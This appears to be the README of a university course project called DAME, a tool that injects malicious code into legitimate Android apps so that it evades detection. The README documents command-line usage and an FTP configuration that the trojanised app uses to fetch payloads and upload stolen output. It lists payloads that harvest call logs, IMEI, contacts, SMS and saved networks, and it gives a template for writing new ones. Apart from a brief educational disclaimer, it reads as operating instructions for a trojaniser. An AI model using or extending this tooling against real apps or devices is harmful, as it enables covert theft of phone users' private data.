University of Sannio - Software and Network Security - A.Y. 2014-2015
WARNING: this project is for educational purposes and the authors are not responsible for any illegal use of the product
- Introduction
- Prerequisites 2.1. Usage prerequisites 2.2. Development prerequisites
- Usage 3.1. Options 3.2. FTP server configuration 3.3. Payloads 3.4. Outputs
- <a href"#DEVELOPMENT">Development 4.1. <a href"#PAYLOADS_DEVELOPMENT">Payloads development 4.2. Binary building
DAME (Dynamic Android Malware Engine) is a system which enables to inject malicious code in Android applications through a dynamic loading process. As opposed to other solutions, it does not change permissions used by the application because it allows to inject only malwares that are compatible with the permissions used by the application. DAME injects the malicious code only in that methods in which the trusted application legitimately uses the permissions required. This method makes the malware detection hard to accomplish.
This section lists the prerequisites that are differentiated depending if your intent is to develop or use only.
Before using DAME, you have to make sure that you have installed the following software packets:
- Java SE JRE (>= 1.7)
- Android SDK Tools
- Androguard
- Python (>= 2.7.6)
Alternatively, you can execute DAME in the A.R.E (Android Reverse Engineering) virtual machine, downloadable from here. A.R.E. has obsolete software, so, if you want to use it, it is mandatory to update Java, Android SDK Tools and Python to the latest available versions.
If you are not interested in develompent, you can jump to section 3.
Before developing DAME, you have to make sure that you have installed the following software packets:
- Java SE JDK (>= 1.7)
- Android SDK Tools
- Androguard
- Ant (>= 1.9.3)
- Maven (>= 3.2.3)
- Python (>= 2.7.6)
As for the usage, also the development can be done in the A.R.E. virtual machine. Obviously, due to outdated software, it is mandatory to update Java, Android SDK Tools, Ant, Maven and Python to the latest available versions.
Before developing, it is also required to follow the subsequent step in order to install the Android API version 19 in the local Maven repository.
- Update your own Android SDK and install the version 21.1.2 of the build tools, and the version 19 of the Android API.
- Annotate the position of the
android.jar
file relative to the version 19 of the API, for example /opt/android-sdk/platforms/android-19/android.jar - From a terminal, execute the following command:
$ mvn install:install-file -Dfile= -DgroupId=com.google.android
-DartifactId=android -Dversion=19 -Dpackaging=jar -DgeneratePom=true
Where
<android-jar>
is the path annotated in the step 2.
To make the Ant scripts properly work, it is required to update the local.properties
file
to adapt it to your own environment.
In order to accomplish this, follow these steps.
- Annotate the path of the
dame-android
project. It might be~/dame/dame-android
if the parent project has been unpacked in the home directory. - Move to
tools
directory of your own Android SDK, for instance /opt/android-sdk/tools - From a terminal, execute the command:
$ ./android update project -p
Where
<dame-android-path>
is the path annotated in the step 1.
These steps allow you to generate the local.properties
file in the root of dame-android
which contains
your SDK path.
In the releases
directory there is the archive that contains the last DAME release.
Unpack the archive where you want.
If you want to execute DAME, you must run the dame
script.
DAME provides a command line interface:
$ dame [options...] FILE.apk
The only mandatory parameter is the FILE.apk
that refers to the APK on which you want to use DAME.
The following list shows various options that is allowed by DAME. (If you execute the dame script without parameters, it is displayed on the screen)
-ag (--androguard) VAL : androguard path (~/tools/androguard/ by
default)
-at (--apktool) VAL : apktool path (./tools/apktool by default)
-bt (--android-build-tools) VAL : Android build tools path (~/tools/android/and
roid-sdk-linux_x86/build-tools/21.1.2/ by
default)
-c (--ftp-server-config) FILE : ftp server file config (config.properties in
the source apk path by default)
-o (--output) VAL : apk file dest path (out.apk in the source
apk path by default)
-py VAL : python path (system path by default)
-v (--version) : Prints the engine version and build time.
The -ag
option (or --androguard
) suggests to the engine the Androguard installation directory. If you don't pass this option, it uses the default path ~/tools/androguard
. If the path is different and if you don't want to pass right path every time, you can make a symbolic link:
$ ln -s <real-androguard-path> ~/tools/androguard
May be required to replace ~ with your home absolute path.
The -at
option (or --apktool
) suggests to the engine the apktool position. DAME is already equipped with a version of apktool that is used by default, but with this option you might use a different one.
The -bt
option (or --android-build-tools
) suggests to the engine the Android build tools path. It uses ~/tools/android/android-sdk-linux_x86/build-tools/21.1.2/
by default. If the path is different and if you don't want to pass every time the right path, you can make a symbolic link as well as the -ag
option.
The -c
option (or --ftp-server-config
) suggests to the engine the FTP server configuration file path that is used by the malicious application to download the payloads and to upload their execution outputs. By default, the engine looks for config.properties
file in the same directory as the source APK. In the section 3.2 you can take a look at the structure of such configuration file.
The -o
option (or --output
) suggests to the engine where to save the malicious APK. By default, the engine outputs the out.apk
file in the same directory as the source APK; if a file with that name already exists, it is overwritten.
The -py
option suggests to the engine where to look for Python interpreter. It is searched in system path by default.
Finally, the -v
option (or --version
) shows the engine version and build date. It can be used without the source APK parameter.
When you execute dame with right options and parameters, the engine analyzes the source APK and suggests a set of payloads that is allowed to be injected. Every suggested payload uses one or more permissions that are already used in the application. You can choose which payloads the engine has to inject by pointing out the showed indexes separated by comma. When execution ends, you obtain the modified APK already signed and optimized that can be installed on a device.
The malicious app doesn't include the choosen payloads but only calls to them. On the first time the app legitimately access to the Internet, the modified app downloads the payloads, while, on every next time, it uploads the execution outputs. You must specify the URL addresses to download the payloads and to upload the output. You must specify this informations in a file that you must pass to the engine by the -c
option (as shown above).
The server configuration file must be formed as follows:
server=<server ftp address with schema and port number, if it isn't 21>
payload_uri=<path, relative to the server root, pointing to the payload jar file>
result_uri=<path, relative to the server root, pointing to the directory where
you want to save the outputs>
username=<login username>
password=<login password>
passive_mode=<true if you want to use passive mode, false otherwise>
For instance, you might have
server=ftp://10.0.2.2
payload_uri=/DAME/payloads.jar
result_uri=/DAME/results/
username=userftp
password=srss2015
passive_mode=false
In such example, the server uses the port 21 by default. If it is different, you must indicate, for instance,
server=ftp://10.0.2.2:1234
The payloads jar file is located in the payloads-jar directory of the release. You need to load such file on your FTP server in the location defined by the configuration file. Make sure that your FTP server has the directory, specified in the result_uri field, accessible for writing, and that the file, indicated in payload_uri field, is accessible for reading.
The payloads are units of malicious code that are dynamically loaded at run-time by the malicious app. Payloads uses permissions which must be already used by the trusted app, and could be executed once (on first call) or always (on every call).
In its latest release, DAME integrates the following payloads:
- CallsLog This payload allows to obtain the call list. It is executed on every payload call.
- IMEI This payload allows to obtain the device IMEI. It is executed only once.
- Networks This payload allows to obtain the list of saved nertowks. It is executed on every payload call.
- ReadContacts This payload allows to obtain the contact list. Due to performance issues, it is executed only once.
- SMSInbox This payload allows to obtain the SMS list. Due to performance issues, it is executed only once.
In order to develop other payloads, you should follow the development section, only after fulfilling all prerequisites.
The output of payload executions are uploaded to the directory given in the FTP server configuration file. The nomenclature follows the syntax:
<payload-name>-<date>-<time>.txt
Where
<payload-name>
is the payload identifier, for instanceIMEI
orSMSInbox
;<date>
is the date in yyyyMMdd format, for instance20150217
indicates February 17, 2015.<time>
is the time including milliseconds in HHmmssSSSS format, for instance152645874
indicates 3:26:45.874 PM.
Before reading this section, you sould follow the instructions in section 2.2.
The DAME project uses Maven as dependency management and installation system.
DAME is made-up of two sub-projects: dame-engine
and dame-android
. The former contains the DAME logic with regard to the source APK manipulation and the generation of the malicious one. The latter, from which the former depends, contains
Android classes and services that are injected in the APK. dame-engine
uses dame-android
for the generation of smali code used in the injection.
In addition to the default payloads, in the dame-android
project, you can develop others of them by following the subsequent rules.
- For each payload, make a sub-package of
it.unisannio.srss.dame.android.payloads
; - In the package created in step 1, make a class which extends it.unisannio.srss.dame.android.payloads.Payload
- In the class created in step 2, implement two constructors:
- The former, without arguments which calls
super()
, is used by the engine for the payload enumeration and configuration loading; - The latter must have one parameter
android.content.Context
which must be passed to the super-class.
- The former, without arguments which calls
- Implement the method
public synchronized void run();
in which encode the payload logic, eventually using theContext
object obtainable from the super-class. - To save the payload output, use the
save(String)
method inherited from the super-class.
The Android services injected by the engine take care of calling the run() method at the right time, as well as provide the storing logic.
For instance, if you want to make a payload named MyPayload, you might have:
package it.unisannio.srss.dame.android.payloads.mypayload;
import it.unisannio.srss.dame.android.payloads.Payload;
import android.content.Context;
public class MyPayload extends Payload {
public MyPayload() {
super();
}
public MyPayload(Context context) {
super(context);
}
// @Override
public synchronized void run() {
// payload logic
// use this.context if needed
// use save(String) to store the output
}
}
For each payload must be specified a configuration file named payload.properties
which must be located in the same package of the class which extends Payload
. Such file must contains the following fields:
# whatever (required, must be unique)
name=<payload-name>
# whatever (not required)
description=<description>
# comma separated permissions (not required)
permissions=<permission[,permission...]>
# once or always. If missing, assumes once
execution=<once-or-always>
The payload name
must be unique. All other fields can be omitted.
In the permissions
field, you have to write all permissions (comma-separated) required by the payload. The prefix android.permission
prefix is not required.
Pay attention: the permissions field is used by the engine to locate the right injection points in the application; if your payload does not require any permission, then it won't be injected at all. In this case, you may want use a common permission even if not used by the payload.
The execution
field, if it is once
, make sure that the payload is executed only once. If always
is used, the payload can be executed more times.
In relation to the previous example, you might have the following configuration:
name=MyPayload
description=This payload does nothing
permissions=READ_CONTACTS
execution=once
To compile and to build binary files, you must follow this process:
- Open a terminal and move to parent project root directory.
- Execute the command $ mvn clean install
When this process ends, you can find in dame-engine/dist
directory all you need to execute DAME. At the same time, in the release directory, a tar.gz
file is created that is named according to project version defined in the pom file. The archive contains everything is contained in dame-engine/dist
.